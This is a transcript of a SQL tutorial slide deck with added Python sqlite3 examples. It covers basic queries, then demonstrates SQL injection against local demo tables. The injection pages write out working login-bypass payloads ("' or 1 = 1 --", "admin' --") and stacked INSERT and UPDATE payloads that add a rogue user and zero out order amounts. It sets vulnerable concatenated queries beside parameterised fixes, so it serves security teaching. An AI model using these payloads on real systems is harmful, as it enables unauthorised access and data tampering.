Transcript of How to Hack a Database

Page 1: SQL INJECTION - How to Hack a Database

Page 2:

Overview

What is SQL?
Database Basics
SQL Insert Basics
SQL Select Basics
SQL Where Basics
SQL AND & OR Basics
SQL Update Basics
SQL Delete Basics
SQL Injection Basics

Page 3:

SQL – What Is It?

Structured Query Language: the Language for the Basic Database Functions
A Common Language for a Variety of Databases
ANSI Standard, with Database-Specific Extensions on Top of a Common Baseline Syntax
A Scripting Language
Allows Comments: "--" Comments Out the Rest of the Line
A Semicolon (";") Terminates a Command

Page 4:

SQL – What Is It?

Pros:
Very Flexible
Universal (Oracle, SQL Server, MySQL)
Relatively Few Commands to Learn

Cons:
Requires Detailed Knowledge of the Structure of the Database
Can Provide Misleading Results

Page 5:

Database Basics

Four Basic Operations: CRUD

C – Create (Insert)
R – Read (Select)
U – Update
D – Delete

Page 6:

SQL Basics – Insert

INSERT – Allows Data to be Inserted into a Table in the Database

Three Basic Components: Table, Column(s), Values

Page 7:

SQL Basics – Insert

Syntax: INSERT INTO table (column(s)) VALUES (value(s))

Table – Name of the Table the Data is Being Stored In
Column(s) – Name of the Column, or Columns, to Insert Data Into
Value(s) – Values to Insert

Note: Columns and Values Must be Listed in the Same Order

Page 8:

SQL Basics – Select

SELECT – Retrieves Data from the Database

Syntax: SELECT column(s) FROM table WHERE condition

Column(s) – Name of the Column, or Columns, to Retrieve; "*" Means All Columns from the Table
Table – Name of the Table to Get Data From; Can be More Than One Table

Page 9:

SQL Basics – Select

Examples
SELECT state_name, state_abbr FROM states
SELECT * FROM agencies

Page 10:

SQL Basics – Where

WHERE Clause Added to Refine the Result Set; Uses Conditional Operators:
=, >, >=, <, <=, != (or <>)
BETWEEN x AND y
IN (list)
LIKE '%string' ("%" is a Wild-Card Matching Any Run of Characters)
IS NULL
NOT BETWEEN / NOT IN / NOT LIKE / IS NOT NULL

Page 11:

SQL Basics – Where

Examples
SELECT * FROM annual_summaries WHERE sd_duration_code = '1'
SELECT state_name FROM states WHERE state_population > 15000000
SELECT * FROM annual_summaries WHERE sd_duration_code IN ('1','W','X') AND annual_summary_year = 2000

Page 12:

SQL Basics – AND & OR

Multiple WHERE Conditions are Linked by AND / OR

"AND" – All Conditions Must be True
"OR" – At Least One Condition Must be True
Group with Parentheses (); AND is Evaluated Before OR, so Group Explicitly When Mixing Them

Page 13:

SQL Basics – Update

Allows Changes to Row(s) of Data in a Table

Three Basic Parts: Name of Table to Update, Column Name to Update, Value to Set

Can Update More Than One Column at a Time

Can Include a WHERE Clause for a More Refined Update (Without One, Every Row in the Table is Changed)

Page 14:

SQL Basics – Update

Syntax: UPDATE table SET column = value WHERE column = value

Example: UPDATE clubs SET ClubName = 'Club 1' WHERE ClubID = 1

Page 15:

SQL Basics – Delete

Allows Data to be Removed from the Database

One Required Part: Table Name
Can Delete All Data in the Table, or Just Selected Data
One Optional Part: WHERE Clause – Allows for Selective Delete

Page 16:

SQL Basics – Delete

Syntax: DELETE FROM table WHERE column = value

Table – Name of the Table to Remove Data From
Column – Name of a Column in the Table
Value – Value to Match in that Column

Examples
DELETE FROM clubs (Deletes All Data in the Table)
DELETE FROM clubs WHERE ClubID = 1
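A worked run of the CRUD statements from Pages 5 through 16, as an added example that is not part of the original deck. It uses Python's built-in sqlite3 module against an in-memory database; the states table rows are constructed here (the deck only names the table and its state_name, state_abbr and state_population columns), and the function names are mine. It goes a little beyond the slides by exercising every WHERE operator on the same data and by contrasting a DELETE with and without a WHERE clause.

```python
import sqlite3

# Constructed sample rows standing in for the deck's states table.
# A NULL population is included so IS NULL has something to match.
STATES = [
    ("California", "CA", 39000000),
    ("Texas", "TX", 29000000),
    ("New York", "NY", 20000000),
    ("Wyoming", "WY", 580000),
    ("New Mexico", "NM", None),
]


def make_db():
    """Create: build the table and INSERT the rows (columns and values in the same order)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE states (state_name TEXT, state_abbr TEXT, state_population INTEGER)"
    )
    conn.executemany(
        "INSERT INTO states (state_name, state_abbr, state_population) VALUES (?, ?, ?)",
        STATES,
    )
    conn.commit()
    return conn


def names(conn, where, params=()):
    """Read: SELECT state_name filtered by a WHERE clause, sorted for stable output.
    `where` is a code-level constant chosen below; values always travel in `params`."""
    rows = conn.execute(
        "SELECT state_name FROM states WHERE " + where + " ORDER BY state_name", params
    )
    return [row[0] for row in rows]


# One query per WHERE operator from the deck.
def big_states(conn):            # comparison operator
    return names(conn, "state_population > ?", (15000000,))

def mid_states(conn):            # BETWEEN x AND y (inclusive on both ends)
    return names(conn, "state_population BETWEEN ? AND ?", (1000000, 25000000))

def by_abbr(conn):               # IN (list); a value with no row is simply not matched
    return names(conn, "state_abbr IN (?, ?, ?)", ("CA", "WY", "ZZ"))

def new_states(conn):            # LIKE with the % wild-card
    return names(conn, "state_name LIKE ?", ("New %",))

def unknown_population(conn):    # IS NULL: "= NULL" would match nothing
    return names(conn, "state_population IS NULL")

def grouped(conn):               # AND / OR with explicit parentheses
    return names(conn, "(state_abbr = ? OR state_abbr = ?) AND state_population > ?",
                 ("TX", "WY", 1000000))


def rename_state(conn, abbr, new_name):
    """Update: change one column of the rows the WHERE clause selects; returns rows changed."""
    cur = conn.execute("UPDATE states SET state_name = ? WHERE state_abbr = ?", (new_name, abbr))
    conn.commit()
    return cur.rowcount


def delete_state(conn, abbr):
    """Delete selected rows; returns rows removed."""
    cur = conn.execute("DELETE FROM states WHERE state_abbr = ?", (abbr,))
    conn.commit()
    return cur.rowcount


def delete_all(conn):
    """Delete with no WHERE clause: empties the table. Returns rows left afterwards."""
    conn.execute("DELETE FROM states")
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM states").fetchone()[0]


if __name__ == "__main__":
    conn = make_db()
    print("population > 15M:", big_states(conn))
    print("grouped AND/OR:", grouped(conn))
    print("rows renamed:", rename_state(conn, "WY", "Wyoming Territory"))
    print("rows deleted:", delete_state(conn, "NM"))
    print("rows left after DELETE FROM states:", delete_all(conn))
```

Every value goes through a `?` placeholder rather than into the SQL text; the same habit is what separates the safe and unsafe versions of the login query on the injection slides.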

Page 17:

SQL Injection Basics

SQL Injection Takes Advantage of Poor Programming: User Input is Concatenated Directly into the SQL Statement

Inserting SQL Commands into an Input Field for Exploitation

Example: User Name / Password Input (admin, admin) Becomes the SQL:
SELECT * FROM users WHERE username = 'admin' AND password = 'admin'
Returns Data for User admin Where the Password is admin

Page 18:

SQL Injection Basics

SQL Injection Input (admin, ' or 1 = 1 --) Becomes the SQL:
SELECT * FROM users WHERE username = 'admin' AND password = '' or 1 = 1 --'
The Single Quote Closes the Password String, "or 1 = 1" is Always True, and "--" Comments Out the Trailing Quote
Because AND Binds Tighter Than OR, the Condition Reads (username = 'admin' AND password = '') OR 1 = 1
Note: This Will Return All Data in the Table, Not Just the admin Row
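The Page 17 and Page 18 queries run against a real database, as an added example that is not part of the original deck. It uses Python's built-in sqlite3 module with a constructed three-row users table (assumed here); `build_vulnerable_query` reproduces the deck's pattern of pasting the input into the SQL string, and `login_safe` is the parameterised form a practitioner would ship instead. It goes one step past the slide by also injecting into the username field, which limits the match to a single chosen account instead of the whole table.

```python
import sqlite3

# Constructed users table standing in for the deck's "users"; passwords are stored
# in the clear only because the deck's query compares them as plain strings.
USERS = [("admin", "s3cret"), ("alice", "wonderland"), ("bob", "builder")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The deck's pattern: input is spliced straight into the SQL text."""
    return ("SELECT * FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Returns every row the (injectable) query matches."""
    return conn.execute(build_vulnerable_query(username, password)).fetchall()


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values separately, so quotes,
    OR and -- in the input are compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()

    # Page 17: legitimate input matches exactly one row either way.
    print(login_vulnerable(conn, "admin", "s3cret"))
    print(login_safe(conn, "admin", "s3cret"))

    # Page 18: the password-field payload. AND binds tighter than OR, so the
    # condition becomes (username = 'admin' AND password = '') OR 1 = 1 and
    # every row comes back.
    payload = "' or 1 = 1 --"
    print(build_vulnerable_query("admin", payload))
    print(len(login_vulnerable(conn, "admin", payload)), "rows returned")
    print(login_safe(conn, "admin", payload))   # []: nobody's password is that string

    # Beyond the slide: the same trick in the username field comments out the
    # password check entirely and returns only the account named.
    print(login_vulnerable(conn, "admin' --", "wrong"))
```

An application that treats "at least one row returned" as a successful login is bypassed by either payload; one that additionally requires exactly one row is still bypassed by the username-field variant, which is why the fix has to be in how the query is built, not in how many rows come back.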

Page 19:

SQL Injection Basics

Can Create a New User Using the Same User Name / Password Form
Example Input (admin, ';INSERT INTO Users VALUES ('Hijack','This') --) Becomes the SQL:
SELECT * FROM users WHERE username = 'admin' AND password = '';INSERT INTO Users VALUES ('Hijack','This') --'

Note: Creates a New User (Hijack) with a Password (This)
Requires That the Database and Driver Execute Stacked (";"-Separated) Statements from One Call, and the VALUES List Must Match the Table's Column Count

Page 20:

SQL Injection Basics

Can Change Table Values Using the Same User Name / Password Form
Example Input (admin, ';UPDATE Orders SET Amount=0.01--) Becomes the SQL:
SELECT * FROM users WHERE username = 'admin' AND password = '';UPDATE Orders SET Amount=0.01--'

Note: Sets All Order Amounts to One Cent, Because the Injected UPDATE Has No WHERE Clause
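The stacked-statement attacks from Pages 19 and 20, as an added example that is not part of the original deck. It uses Python's built-in sqlite3 module with constructed Users and Orders tables (two columns each, so the deck's INSERT with a bare VALUES list fits). The caveat it adds is that these payloads only work where the driver runs several ";"-separated statements from one call: sqlite3's execute() refuses that, while executescript() stands in for a driver or database that allows it. Function names are mine.

```python
import sqlite3

# Constructed tables standing in for the deck's Users and Orders.
SETUP = """
    CREATE TABLE Users (username TEXT, password TEXT);
    INSERT INTO Users VALUES ('admin', 's3cret');
    CREATE TABLE Orders (OrderID INTEGER, Amount REAL);
    INSERT INTO Orders VALUES (1, 120.00), (2, 75.50), (3, 9.99);
"""

PAYLOAD_INSERT = "';INSERT INTO Users VALUES ('Hijack','This') --"   # Page 19 input
PAYLOAD_UPDATE = "';UPDATE Orders Set Amount=0.01--"                # Page 20 input


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SETUP)
    return conn


def build_vulnerable_query(username, password):
    """The deck's pattern: input spliced straight into the SQL text."""
    return f"SELECT * FROM Users WHERE username = '{username}' AND password = '{password}'"


def login_vulnerable(conn, username, password, stacked_allowed):
    """Run the injectable login query.

    stacked_allowed=False uses execute(), which in sqlite3 rejects more than one
    statement per call; True uses executescript(), standing in for a database
    driver that runs everything up to the comment marker."""
    sql = build_vulnerable_query(username, password)
    if stacked_allowed:
        conn.executescript(sql)
        return "executed"
    try:
        conn.execute(sql)
        return "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):   # exception type differs by Python version
        return "rejected: only one statement per call"


def login_safe(conn, username, password):
    """Parameterised form: the payload is just a password string nobody has."""
    return conn.execute(
        "SELECT * FROM Users WHERE username = ? AND password = ?", (username, password)
    ).fetchall()


def user_names(conn):
    return [r[0] for r in conn.execute("SELECT username FROM Users ORDER BY username")]


def order_amounts(conn):
    return [r[0] for r in conn.execute("SELECT Amount FROM Orders ORDER BY OrderID")]


if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_query("admin", PAYLOAD_INSERT))

    print(login_vulnerable(conn, "admin", PAYLOAD_INSERT, stacked_allowed=False))
    print("users:", user_names(conn))        # unchanged: the driver refused the second statement

    print(login_vulnerable(conn, "admin", PAYLOAD_INSERT, stacked_allowed=True))
    print("users:", user_names(conn))        # Hijack now exists

    print(login_vulnerable(conn, "admin", PAYLOAD_UPDATE, stacked_allowed=True))
    print("amounts:", order_amounts(conn))   # every order is now 0.01

    print(login_safe(conn, "admin", PAYLOAD_UPDATE))   # [] and nothing is modified
```

Whether a driver accepts stacked statements is a property of the driver and its connection options, not of the application, so a login form that is safe from this particular payload today can become exploitable after a driver upgrade or a change of database; the parameterised query is safe regardless.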